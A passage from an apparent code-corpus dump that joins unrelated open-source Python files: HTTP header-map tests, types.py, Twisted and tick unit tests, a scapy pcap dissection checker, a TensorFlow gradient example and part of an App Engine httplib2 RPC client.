(b'k2', b'v2'),
(b'k2', b'v3'),
]
h = HTTPHeaderMap(items)
assert list(h) == items
def test_can_create_from_multiple_iterables(self):
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
h = HTTPHeaderMap(items, items, items)
assert list(h) == items + items + items
def test_create_from_iterables_and_kwargs(self):
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
h = list(HTTPHeaderMap(items, k3='v4', k4='v5'))
# kwargs are an unordered dictionary, so allow for both possible
# iteration orders.
assert (
h == items + [(b'k3', b'v4'), (b'k4', b'v5')] or
h == items + [(b'k4', b'v5'), (b'k3', b'v4')]
)
def test_raw_iteration(self):
items = [
(b'k1', b'v2'),
(b'k2', b'v2, v3, v4'),
(b'k2', b'v3'),
]
h = HTTPHeaderMap(items)
assert list(h.iter_raw()) == items
def test_headers_must_be_strings(self):
with pytest.raises(ValueError):
HTTPHeaderMap(key=1)
h = HTTPHeaderMap()
with pytest.raises(ValueError):
h['k'] = 1
with pytest.raises(ValueError):
h[1] = 'v'
def test_merge_self_is_no_op(self):
h = HTTPHeaderMap([(b'hi', b'there')])
h.merge(h)
assert h == HTTPHeaderMap([(b'hi', b'there')])
def test_merge_headermaps_preserves_raw(self):
h1 = HTTPHeaderMap([
(b'hi', b'there')
])
h2 = HTTPHeaderMap([
(b'Hi', b'there, sir, maam')
])
h1.merge(h2)
assert list(h1.iter_raw()) == [
(b'hi', b'there'),
(b'Hi', b'there, sir, maam'),
]
def test_merge_header_map_dict(self):
h = HTTPHeaderMap([(b'hi', b'there')])
d = {'cat': 'dog'}
h.merge(d)
assert list(h.items()) == [
(b'hi', b'there'),
(b'cat', b'dog'),
]
def test_replacing(self):
h = HTTPHeaderMap([
(b'name', b'value'),
(b'name2', b'value2'),
(b'name2', b'value2'),
(b'name3', b'value3'),
])
h.replace('name2', '42')
h.replace('name4', 'other_value')
assert list(h.items()) == [
(b'name', b'value'),
(b'name2', b'42'),
(b'name3', b'value3'),
(b'name4', b'other_value'),
]
| mit |
papados/ordersys | Lib/types.py | 304 | 2040 | """Define names for all type symbols known in the standard interpreter.
Types that are part of optional modules (e.g. array) are not listed.
"""
import sys
# Iterators in Python aren't a matter of type but of protocol. A large
# and changing number of builtin types implement *some* flavor of
# iterator. Don't check the type! Use hasattr to check for both
# "__iter__" and "next" attributes instead.
NoneType = type(None)
TypeType = type
ObjectType = object
IntType = int
LongType = long
FloatType = float
BooleanType = bool
try:
ComplexType = complex
except NameError:
pass
StringType = str
# StringTypes is already outdated. Instead of writing "type(x) in
# types.StringTypes", you should use "isinstance(x, basestring)". But
# we keep around for compatibility with Python 2.2.
try:
UnicodeType = unicode
StringTypes = (StringType, UnicodeType)
except NameError:
StringTypes = (StringType,)
BufferType = buffer
TupleType = tuple
ListType = list
DictType = DictionaryType = dict
def _f(): pass
FunctionType = type(_f)
LambdaType = type(lambda: None) # Same as FunctionType
CodeType = type(_f.func_code)
def _g():
yield 1
GeneratorType = type(_g())
class _C:
def _m(self): pass
ClassType = type(_C)
UnboundMethodType = type(_C._m) # Same as MethodType
_x = _C()
InstanceType = type(_x)
MethodType = type(_x._m)
BuiltinFunctionType = type(len)
BuiltinMethodType = type([].append) # Same as BuiltinFunctionType
ModuleType = type(sys)
FileType = file
XRangeType = xrange
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
TracebackType = type(tb)
FrameType = type(tb.tb_frame)
del tb
SliceType = slice
EllipsisType = type(Ellipsis)
DictProxyType = type(TypeType.__dict__)
NotImplementedType = type(NotImplemented)
# For Jython, the following two types are identical
GetSetDescriptorType = type(FunctionType.func_code)
MemberDescriptorType = type(FunctionType.func_globals)
del sys, _f, _g, _C, _x # Not for export
| unlicense |
imsparsh/python-for-android | python-modules/twisted/twisted/web/test/test_util.py | 49 | 1599 | # Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.util}.
"""
from twisted.trial.unittest import TestCase
from twisted.web.util import _hasSubstring
class HasSubstringTestCase(TestCase):
"""
Test regular expression-based substring searching.
"""
def test_hasSubstring(self):
"""
L{_hasSubstring} returns True if the specified substring is present in
the text being searched.
"""
self.assertTrue(_hasSubstring("foo", "<foo>"))
def test_hasSubstringWithoutMatch(self):
"""
L{_hasSubstring} returns False if the specified substring is not
present in the text being searched.
"""
self.assertFalse(_hasSubstring("foo", "<bar>"))
def test_hasSubstringOnlyMatchesStringsWithNonAlphnumericNeighbors(self):
"""
L{_hasSubstring} returns False if the specified substring is present
in the text being searched but the characters surrounding the
substring are alphanumeric.
"""
self.assertFalse(_hasSubstring("foo", "barfoobaz"))
self.assertFalse(_hasSubstring("foo", "1foo2"))
def test_hasSubstringEscapesKey(self):
"""
L{_hasSubstring} uses a regular expression to determine if a substring
exists in a text snippet. The substring is escaped to ensure that it
doesn't interfere with the regular expression.
"""
self.assertTrue(_hasSubstring("[b-a]",
"Python can generate names like [b-a]."))
| apache-2.0 |
lthurlow/python-tcpsnoop | scapy/tools/check_asdis.py | 27 | 2854 | #! /usr/bin/env python
import getopt
def usage():
print >>sys.stderr,"""Usage: check_asdis -i <pcap_file> [-o <wrong_packets.pcap>]
-v increase verbosity
-d hexdiff packets that differ
-z compress output pcap
-a open pcap file in append mode"""
def main(argv):
PCAP_IN = None
PCAP_OUT = None
COMPRESS=False
APPEND=False
DIFF=False
VERBOSE=0
try:
opts=getopt.getopt(argv, "hi:o:azdv")
for opt, parm in opts[0]:
if opt == "-h":
usage()
raise SystemExit
elif opt == "-i":
PCAP_IN = parm
elif opt == "-o":
PCAP_OUT = parm
elif opt == "-v":
VERBOSE += 1
elif opt == "-d":
DIFF = True
elif opt == "-a":
APPEND = True
elif opt == "-z":
COMPRESS = True
if PCAP_IN is None:
raise getopt.GetoptError("Missing pcap file (-i)")
except getopt.GetoptError,e:
print >>sys.stderr,"ERROR: %s" % e
raise SystemExit
from scapy.config import conf
from scapy.utils import RawPcapReader,RawPcapWriter,hexdiff
from scapy.layers import all
pcap = RawPcapReader(PCAP_IN)
pcap_out = None
if PCAP_OUT:
pcap_out = RawPcapWriter(PCAP_OUT, append=APPEND, gz=COMPRESS, linktype=pcap.linktype)
pcap_out._write_header(None)
LLcls = conf.l2types.get(pcap.linktype)
if LLcls is None:
print >>sys.stderr," Unknown link type [%i]. Can't test anything!" % pcap.linktype
raise SystemExit
i=-1
differ=0
failed=0
for p1,meta in pcap:
i += 1
try:
p2d = LLcls(p1)
p2 = str(p2d)
except KeyboardInterrupt:
raise
except Exception,e:
print "Dissection error on packet %i" % i
failed += 1
else:
if p1 == p2:
if VERBOSE >= 2:
print "Packet %i ok" % i
continue
else:
print "Packet %i differs" % i
differ += 1
if VERBOSE >= 1:
print repr(p2d)
if DIFF:
hexdiff(p1,p2)
if pcap_out is not None:
pcap_out.write(p1)
i+=1
correct = i-differ-failed
print "%i total packets. %i ok, %i differed, %i failed. %.2f%% correct." % (i, correct, differ,
failed, i and 100.0*(correct)/i)
if __name__ == "__main__":
import sys
try:
main(sys.argv[1:])
except KeyboardInterrupt:
print >>sys.stderr,"Interrupted by user."
| mit |
guschmue/tensorflow | tensorflow/examples/adding_an_op/zero_out_grad_2.py | 184 | 1662 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The gradient of the tutorial zero_out op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import sparse_ops
@ops.RegisterGradient("ZeroOut")
def _zero_out_grad(op, grad):
"""The gradients for `zero_out`.
Args:
op: The `zero_out` `Operation` that we are differentiating, which we can use
to find the inputs and outputs of the original op.
grad: Gradient with respect to the output of the `zero_out` op.
Returns:
Gradients with respect to the input of `zero_out`.
"""
to_zero = op.inputs[0]
shape = array_ops.shape(to_zero)
index = array_ops.zeros_like(shape)
first_grad = array_ops.reshape(grad, [-1])[0]
to_zero_grad = sparse_ops.sparse_to_dense([index], shape, first_grad, 0)
return [to_zero_grad] # List of one Tensor, since we have one input
| apache-2.0 |
Dekken/tick | tick/linear_model/tests/logistic_regression_test.py | 2 | 24388 | # License: BSD 3 clause
import itertools
import unittest
import numpy as np
from sklearn.metrics.ranking import roc_auc_score
from tick.base.inference import InferenceTest
from tick.linear_model import SimuLogReg, LogisticRegression
from tick.simulation import weights_sparse_gauss
from tick.preprocessing.features_binarizer import FeaturesBinarizer
from tick.prox import ProxZero, ProxL1, ProxL2Sq, ProxElasticNet, ProxTV, \
ProxBinarsity
solvers = ['gd', 'agd', 'sgd', 'sdca', 'bfgs', 'svrg']
penalties = ['none', 'l2', 'l1', 'tv', 'elasticnet', 'binarsity']
class Test(InferenceTest):
def setUp(self):
self.float_1 = 5.23e-4
self.float_2 = 3.86e-2
self.int_1 = 3198
self.int_2 = 230
self.X = np.zeros((5, 5))
self.y = np.zeros(5)
self.y[0] = 1
@staticmethod
def get_train_data(n_features=20, n_samples=3000, nnz=5):
np.random.seed(12)
weights0 = weights_sparse_gauss(n_features, nnz=nnz)
interc0 = 0.1
features, y = SimuLogReg(weights0, interc0, n_samples=n_samples,
verbose=False).simulate()
return features, y
def test_LogisticRegression_fit(self):
"""...Test LogisticRegression fit with different solvers and penalties
"""
sto_seed = 179312
raw_features, y = Test.get_train_data()
for fit_intercept in [True, False]:
for penalty in penalties:
if penalty == 'binarsity':
# binarize features
n_cuts = 3
binarizer = FeaturesBinarizer(n_cuts=n_cuts)
features = binarizer.fit_transform(raw_features)
else:
features = raw_features
for solver in solvers:
solver_kwargs = {
'penalty': penalty,
'tol': 1e-5,
'solver': solver,
'verbose': False,
'max_iter': 10,
'fit_intercept': fit_intercept
}
if penalty != 'none':
solver_kwargs['C'] = 100
if penalty == 'binarsity':
solver_kwargs['blocks_start'] = binarizer.blocks_start
solver_kwargs[
'blocks_length'] = binarizer.blocks_length
if solver == 'sdca':
solver_kwargs['sdca_ridge_strength'] = 2e-2
if solver in ['sgd', 'svrg', 'sdca']:
solver_kwargs['random_state'] = sto_seed
if solver == 'sgd':
solver_kwargs['step'] = 1.
if solver == 'bfgs':
# BFGS only accepts ProxZero and ProxL2sq for now
if penalty not in ['none', 'l2']:
continue
learner = LogisticRegression(**solver_kwargs)
learner.fit(features, y)
probas = learner.predict_proba(features)[:, 1]
auc = roc_auc_score(y, probas)
self.assertGreater(
auc, 0.7, "solver %s with penalty %s and "
"intercept %s reached too low AUC" % (solver, penalty,
fit_intercept))
def test_LogisticRegression_warm_start(self):
"""...Test LogisticRegression warm start
"""
sto_seed = 179312
X, y = Test.get_train_data()
fit_intercepts = [True, False]
cases = itertools.product(solvers, fit_intercepts)
for solver, fit_intercept in cases:
solver_kwargs = {
'solver': solver,
'max_iter': 2,
'fit_intercept': fit_intercept,
'warm_start': True,
'tol': 0
}
if solver == 'sdca':
msg = '^SDCA cannot be warm started$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(**solver_kwargs)
else:
if solver in ['sgd', 'svrg']:
solver_kwargs['random_state'] = sto_seed
if solver == 'sgd':
solver_kwargs['step'] = .3
learner = LogisticRegression(**solver_kwargs)
learner.fit(X, y)
if fit_intercept:
coeffs_1 = np.hstack((learner.weights, learner.intercept))
else:
coeffs_1 = learner.weights
learner.fit(X, y)
if fit_intercept:
coeffs_2 = np.hstack((learner.weights, learner.intercept))
else:
coeffs_2 = learner.weights
# Thanks to warm start objective should have decreased
self.assertLess(
learner._solver_obj.objective(coeffs_2),
learner._solver_obj.objective(coeffs_1))
@staticmethod
def specific_solver_kwargs(solver):
"""...A simple method to as systematically some kwargs to our tests
"""
return dict()
def test_LogisticRegression_settings(self):
"""...Test LogisticRegression basic settings
"""
# solver
from tick.solver import AGD, GD, BFGS, SGD, SVRG, SDCA
solver_class_map = {
'gd': GD,
'agd': AGD,
'sgd': SGD,
'svrg': SVRG,
'bfgs': BFGS,
'sdca': SDCA
}
for solver in solvers:
learner = LogisticRegression(solver=solver,
**Test.specific_solver_kwargs(solver))
solver_class = solver_class_map[solver]
self.assertTrue(isinstance(learner._solver_obj, solver_class))
msg = '^``solver`` must be one of agd, bfgs, gd, sdca, sgd, ' \
'svrg, got wrong_name$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(solver='wrong_name')
# prox
prox_class_map = {
'none': ProxZero,
'l1': ProxL1,
'l2': ProxL2Sq,
'elasticnet': ProxElasticNet,
'tv': ProxTV,
'binarsity': ProxBinarsity
}
for penalty in penalties:
if penalty == 'binarsity':
learner = LogisticRegression(penalty=penalty, blocks_start=[0],
blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty)
prox_class = prox_class_map[penalty]
self.assertTrue(isinstance(learner._prox_obj, prox_class))
msg = '^``penalty`` must be one of binarsity, elasticnet, l1, l2, none, ' \
'tv, got wrong_name$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(penalty='wrong_name')
def test_LogisticRegression_model_settings(self):
"""...Test LogisticRegression setting of parameters of model
"""
for solver in solvers:
learner = LogisticRegression(fit_intercept=True, solver=solver)
self.assertEqual(learner.fit_intercept, True)
self.assertEqual(learner._model_obj.fit_intercept, True)
learner.fit_intercept = False
self.assertEqual(learner.fit_intercept, False)
self.assertEqual(learner._model_obj.fit_intercept, False)
learner = LogisticRegression(fit_intercept=False, solver=solver)
self.assertEqual(learner.fit_intercept, False)
self.assertEqual(learner._model_obj.fit_intercept, False)
learner.fit_intercept = True
self.assertEqual(learner.fit_intercept, True)
self.assertEqual(learner._model_obj.fit_intercept, True)
def test_LogisticRegression_penalty_C(self):
"""...Test LogisticRegression setting of parameter of C
"""
for penalty in penalties:
if penalty != 'none':
if penalty == 'binarsity':
learner = LogisticRegression(
penalty=penalty, C=self.float_1, blocks_start=[0],
blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty,
C=self.float_1)
self.assertEqual(learner.C, self.float_1)
self.assertEqual(learner._prox_obj.strength, 1. / self.float_1)
learner.C = self.float_2
self.assertEqual(learner.C, self.float_2)
self.assertEqual(learner._prox_obj.strength, 1. / self.float_2)
msg = '^``C`` must be positive, got -1$'
with self.assertRaisesRegex(ValueError, msg):
if penalty == 'binarsity':
LogisticRegression(penalty=penalty, C=-1,
blocks_start=[0], blocks_length=[1])
else:
LogisticRegression(penalty=penalty, C=-1)
else:
msg = '^You cannot set C for penalty "%s"$' % penalty
with self.assertWarnsRegex(RuntimeWarning, msg):
if penalty == 'binarsity':
LogisticRegression(penalty=penalty, C=self.float_1,
blocks_start=[0], blocks_length=[1])
else:
LogisticRegression(penalty=penalty, C=self.float_1)
if penalty == 'binarsity':
learner = LogisticRegression(
penalty=penalty, blocks_start=[0], blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty)
with self.assertWarnsRegex(RuntimeWarning, msg):
learner.C = self.float_1
msg = '^``C`` must be positive, got -2$'
with self.assertRaisesRegex(ValueError, msg):
learner.C = -2
def test_LogisticRegression_penalty_elastic_net_ratio(self):
"""...Test LogisticRegression setting of parameter of elastic_net_ratio
"""
ratio_1 = 0.6
ratio_2 = 0.3
for penalty in penalties:
if penalty == 'elasticnet':
learner = LogisticRegression(penalty=penalty, C=self.float_1,
elastic_net_ratio=ratio_1)
self.assertEqual(learner.C, self.float_1)
self.assertEqual(learner.elastic_net_ratio, ratio_1)
self.assertEqual(learner._prox_obj.strength, 1. / self.float_1)
self.assertEqual(learner._prox_obj.ratio, ratio_1)
learner.elastic_net_ratio = ratio_2
self.assertEqual(learner.C, self.float_1)
self.assertEqual(learner.elastic_net_ratio, ratio_2)
self.assertEqual(learner._prox_obj.ratio, ratio_2)
else:
msg = '^Penalty "%s" has no elastic_net_ratio attribute$$' % \
penalty
with self.assertWarnsRegex(RuntimeWarning, msg):
if penalty == 'binarsity':
LogisticRegression(penalty=penalty,
elastic_net_ratio=0.8,
blocks_start=[0], blocks_length=[1])
else:
LogisticRegression(penalty=penalty,
elastic_net_ratio=0.8)
if penalty == 'binarsity':
learner = LogisticRegression(
penalty=penalty, blocks_start=[0], blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty)
with self.assertWarnsRegex(RuntimeWarning, msg):
learner.elastic_net_ratio = ratio_1
def test_LogisticRegression_solver_basic_settings(self):
"""...Test LogisticRegression setting of basic parameters of solver
"""
for solver in solvers:
# tol
learner = LogisticRegression(solver=solver, tol=self.float_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.tol, self.float_1)
self.assertEqual(learner._solver_obj.tol, self.float_1)
learner.tol = self.float_2
self.assertEqual(learner.tol, self.float_2)
self.assertEqual(learner._solver_obj.tol, self.float_2)
# max_iter
learner = LogisticRegression(solver=solver, max_iter=self.int_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.max_iter, self.int_1)
self.assertEqual(learner._solver_obj.max_iter, self.int_1)
learner.max_iter = self.int_2
self.assertEqual(learner.max_iter, self.int_2)
self.assertEqual(learner._solver_obj.max_iter, self.int_2)
# verbose
learner = LogisticRegression(solver=solver, verbose=True,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.verbose, True)
self.assertEqual(learner._solver_obj.verbose, True)
learner.verbose = False
self.assertEqual(learner.verbose, False)
self.assertEqual(learner._solver_obj.verbose, False)
learner = LogisticRegression(solver=solver, verbose=False,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.verbose, False)
self.assertEqual(learner._solver_obj.verbose, False)
learner.verbose = True
self.assertEqual(learner.verbose, True)
self.assertEqual(learner._solver_obj.verbose, True)
# print_every
learner = LogisticRegression(solver=solver, print_every=self.int_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.print_every, self.int_1)
self.assertEqual(learner._solver_obj.print_every, self.int_1)
learner.print_every = self.int_2
self.assertEqual(learner.print_every, self.int_2)
self.assertEqual(learner._solver_obj.print_every, self.int_2)
# record_every
learner = LogisticRegression(solver=solver,
record_every=self.int_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.record_every, self.int_1)
self.assertEqual(learner._solver_obj.record_every, self.int_1)
learner.record_every = self.int_2
self.assertEqual(learner.record_every, self.int_2)
self.assertEqual(learner._solver_obj.record_every, self.int_2)
def test_LogisticRegression_solver_step(self):
"""...Test LogisticRegression setting of step parameter of solver
"""
for solver in solvers:
if solver in ['sdca', 'bfgs']:
msg = '^Solver "%s" has no settable step$' % solver
with self.assertWarnsRegex(RuntimeWarning, msg):
learner = LogisticRegression(
solver=solver, step=1,
**Test.specific_solver_kwargs(solver))
self.assertIsNone(learner.step)
else:
learner = LogisticRegression(
solver=solver, step=self.float_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.step, self.float_1)
self.assertEqual(learner._solver_obj.step, self.float_1)
learner.step = self.float_2
self.assertEqual(learner.step, self.float_2)
self.assertEqual(learner._solver_obj.step, self.float_2)
if solver in ['sgd']:
msg = '^SGD step needs to be tuned manually$'
with self.assertWarnsRegex(RuntimeWarning, msg):
learner = LogisticRegression(solver='sgd')
learner.fit(self.X, self.y)
def test_LogisticRegression_solver_random_state(self):
"""...Test LogisticRegression setting of random_state parameter of solver
"""
for solver in solvers:
if solver in ['bfgs', 'agd', 'gd']:
msg = '^Solver "%s" has no settable random_state$' % solver
with self.assertWarnsRegex(RuntimeWarning, msg):
learner = LogisticRegression(
solver=solver, random_state=1,
**Test.specific_solver_kwargs(solver))
self.assertIsNone(learner.random_state)
else:
learner = LogisticRegression(
solver=solver, random_state=self.int_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.random_state, self.int_1)
self.assertEqual(learner._solver_obj.seed, self.int_1)
msg = '^random_state must be positive, got -1$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(solver=solver, random_state=-1,
**Test.specific_solver_kwargs(solver))
msg = '^random_state is readonly in LogisticRegression$'
with self.assertRaisesRegex(AttributeError, msg):
learner = LogisticRegression(
solver=solver, **Test.specific_solver_kwargs(solver))
learner.random_state = self.int_2
def test_LogisticRegression_solver_sdca_ridge_strength(self):
"""...Test LogisticRegression setting of sdca_ridge_strength parameter
of solver
"""
for solver in solvers:
if solver == 'sdca':
learner = LogisticRegression(
solver=solver, sdca_ridge_strength=self.float_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.sdca_ridge_strength, self.float_1)
self.assertEqual(learner._solver_obj._solver.get_l_l2sq(),
self.float_1)
learner.sdca_ridge_strength = self.float_2
self.assertEqual(learner.sdca_ridge_strength, self.float_2)
self.assertEqual(learner._solver_obj._solver.get_l_l2sq(),
self.float_2)
else:
msg = '^Solver "%s" has no sdca_ridge_strength attribute$' % \
solver
with self.assertWarnsRegex(RuntimeWarning, msg):
LogisticRegression(solver=solver, sdca_ridge_strength=1e-2,
**Test.specific_solver_kwargs(solver))
learner = LogisticRegression(
solver=solver, **Test.specific_solver_kwargs(solver))
with self.assertWarnsRegex(RuntimeWarning, msg):
learner.sdca_ridge_strength = self.float_1
def test_safe_array_cast(self):
"""...Test error and warnings raised by LogLearner constructor
"""
msg = '^Copying array of size \(5, 5\) to convert it in the ' \
'right format$'
with self.assertWarnsRegex(RuntimeWarning, msg):
LogisticRegression._safe_array(self.X.astype(int))
msg = '^Copying array of size \(3, 5\) to create a ' \
'C-contiguous version of it$'
with self.assertWarnsRegex(RuntimeWarning, msg):
LogisticRegression._safe_array(self.X[::2])
np.testing.assert_array_equal(self.X,
LogisticRegression._safe_array(self.X))
def test_labels_encoding(self):
"""...Test that class encoding is well done for LogReg
"""
learner = LogisticRegression(max_iter=1)
np.random.seed(38027)
n_features = 3
n_samples = 5
X = np.random.rand(n_samples, n_features)
encoded_y = np.array([1., -1., 1., -1., -1.])
learner.fit(X, encoded_y)
np.testing.assert_array_equal(learner.classes, [-1., 1.])
np.testing.assert_array_equal(
learner._encode_labels_vector(encoded_y), encoded_y)
zero_one_y = np.array([1., 0., 1., 0., 0.])
learner.fit(X, zero_one_y)
np.testing.assert_array_equal(learner.classes, [0., 1.])
np.testing.assert_array_equal(
learner._encode_labels_vector(zero_one_y), encoded_y)
text_y = np.array(['cat', 'dog', 'cat', 'dog', 'dog'])
learner.fit(X, text_y)
np.testing.assert_array_equal(set(learner.classes), {'cat', 'dog'})
encoded_text_y = learner._encode_labels_vector(text_y)
np.testing.assert_array_equal(
encoded_text_y,
encoded_y * np.sign(encoded_text_y[0]) * np.sign(encoded_y[0]))
def test_predict(self):
"""...Test LogReg prediction
"""
labels_mappings = [{
-1: -1.,
1: 1.
}, {
-1: 1.,
1: -1.
}, {
-1: 1,
1: 0
}, {
-1: 0,
1: 1
}, {
-1: 'cat',
1: 'dog'
}]
for labels_mapping in labels_mappings:
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
y = np.vectorize(labels_mapping.get)(y)
learner = LogisticRegression(random_state=32789, tol=1e-9)
learner.fit(X, y)
X_test, y_test = Test.get_train_data(n_features=12, n_samples=5,
nnz=0)
predicted_y = [1., 1., -1., 1., 1.]
predicted_y = np.vectorize(labels_mapping.get)(predicted_y)
np.testing.assert_array_equal(learner.predict(X_test), predicted_y)
def test_predict_proba(self):
"""...Test LogReg predict_proba
"""
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
learner = LogisticRegression(random_state=32289, tol=1e-13)
learner.fit(X, y)
X_test, y_test = Test.get_train_data(n_features=12, n_samples=5, nnz=0)
predicted_probas = np.array(
[[0.35851418, 0.64148582], [0.42549328, 0.57450672],
[0.6749705, 0.3250295], [0.39684181,
0.60315819], [0.42732443, 0.57267557]])
np.testing.assert_array_almost_equal(
learner.predict_proba(X_test), predicted_probas, decimal=3)
def test_decision_function(self):
"""...Test LogReg predict_proba
"""
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
learner = LogisticRegression(random_state=32789, tol=1e-13)
learner.fit(X, y)
X_test, y_test = Test.get_train_data(n_features=12, n_samples=5, nnz=0)
decision_function_values = np.array(
[0.58182, 0.30026, -0.73075, 0.41864, 0.29278])
np.testing.assert_array_almost_equal(
learner.decision_function(X_test), decision_function_values,
decimal=3)
def test_float_double_arrays_fitting(self):
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
learner_64 = LogisticRegression(random_state=32789, tol=1e-13)
learner_64.fit(X, y)
weights_64 = learner_64.weights
self.assertEqual(weights_64.dtype, np.dtype('float64'))
learner_32 = LogisticRegression(random_state=32789, tol=1e-13)
X_32, y_32 = X.astype('float32'), y.astype('float32')
learner_32.fit(X_32, y_32)
weights_32 = learner_32.weights
self.assertEqual(weights_32.dtype, np.dtype('float32'))
np.testing.assert_array_almost_equal(weights_32, weights_64, decimal=5)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
undoware/neutron-drive | google_appengine/google/appengine/tools/appengine_rpc_httplib2.py | 3 | 12798 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Library with a variant of appengine_rpc using httplib2.
The httplib2 module offers some of the features in appengine_rpc, with
one important one being a simple integration point for OAuth2 integration.
"""
import cStringIO
import logging
import os
import re
import urllib
import urllib2
import httplib2
from oauth2client import client
from oauth2client import file as oauth2client_file
from oauth2client import tools
logger = logging.getLogger('google.appengine.tools.appengine_rpc')
class Error(Exception):
pass
class AuthPermanentFail(Error):
"""Authentication will not succeed in the current context."""
class MemoryCache(object):
"""httplib2 Cache implementation which only caches locally."""
def __init__(self):
self.cache = {}
def get(self, key):
return self.cache.get(key)
def set(self, key, value):
self.cache[key] = value
def delete(self, key):
self.cache.pop(key, None)
def RaiseHttpError(url, response_info, response_body, extra_msg=''):
"""Raise a urllib2.HTTPError based on an httplib2 response tuple."""
if response_body is not None:
stream = cStringIO.StringIO()
stream.write(response_body)
stream.seek(0)
else:
stream = None
if not extra_msg:
msg = response_info.reason
else:
msg = response_info.reason + ' ' + extra_msg
raise urllib2.HTTPError(url, response_info.status, msg, response_info, stream)
class HttpRpcServerHttpLib2(object):
"""A variant of HttpRpcServer which uses httplib2.
This follows the same interface as appengine_rpc.AbstractRpcServer,
but is a totally separate implementation.
"""
def __init__(self, host, auth_function, user_agent, source,
host_override=None, extra_headers=None, save_cookies=False,
auth_tries=None, account_type=None, debug_data=True, secure=True,
rpc_tries=3):
"""Creates a new HttpRpcServerHttpLib2.
Args:
host: The host to send requests to.
auth_function: Saved but ignored; may be used by subclasses.
user_agent: The user-agent string to send to the server. Specify None to
omit the user-agent header.
source: Saved but ignored; may be used by subclasses.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request. Values
supplied here will override other default headers that are supplied.
save_cookies: Saved but ignored; may be used by subclasses.
auth_tries: The number of times to attempt auth_function before failing.
account_type: Saved but ignored; may be used by subclasses.
debug_data: Whether debugging output should include data contents.
secure: If the requests sent using Send should be sent over HTTPS.
rpc_tries: The number of rpc retries upon http server error (i.e.
Response code >= 500 and < 600) before failing.
"""
self.host = host
self.auth_function = auth_function
self.user_agent = user_agent
self.source = source
self.host_override = host_override
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.auth_tries = auth_tries
self.account_type = account_type
self.debug_data = debug_data
self.secure = secure
self.rpc_tries = rpc_tries
self.scheme = secure and 'https' or 'http'
self.certpath = os.path.normpath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'lib', 'cacerts',
'cacerts.txt'))
self.cert_file_available = os.path.exists(self.certpath)
self.memory_cache = MemoryCache()
def _Authenticate(self, http, saw_error):
"""Pre or Re-auth stuff...
Args:
http: An 'Http' object from httplib2.
saw_error: If the user has already tried to contact the server.
If they have, it's OK to prompt them. If not, we should not be asking
them for auth info--it's possible it'll suceed w/o auth.
"""
raise NotImplementedError()
def Send(self, request_path, payload='',
content_type='application/octet-stream',
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
Raises:
AuthPermanentFail: If authorization failed in a permanent way.
urllib2.HTTPError: On most HTTP errors.
"""
self.http = httplib2.Http(cache=self.memory_cache, ca_certs=self.certpath)
self.http.follow_redirects = False
self.http.timeout = timeout
url = '%s://%s%s' % (self.scheme, self.host, request_path)
if kwargs:
url += '?' + urllib.urlencode(kwargs)
headers = {}
if self.extra_headers:
headers.update(self.extra_headers)
headers['X-appcfg-api-version'] = '1'
if payload is not None:
method = 'POST'
headers['content-length'] = str(len(payload))
headers['Content-Type'] = content_type
else:
method = 'GET'
if self.host_override:
headers['Host'] = self.host_override
tries = 0
auth_tries = [0]
def NeedAuth():
"""Marker that we need auth; it'll actually be tried next time around."""
auth_tries[0] += 1
if auth_tries[0] > self.auth_tries:
RaiseHttpError(url, response_info, response, 'Too many auth attempts.')
while tries < self.rpc_tries:
tries += 1
self._Authenticate(self.http, auth_tries[0] > 0)
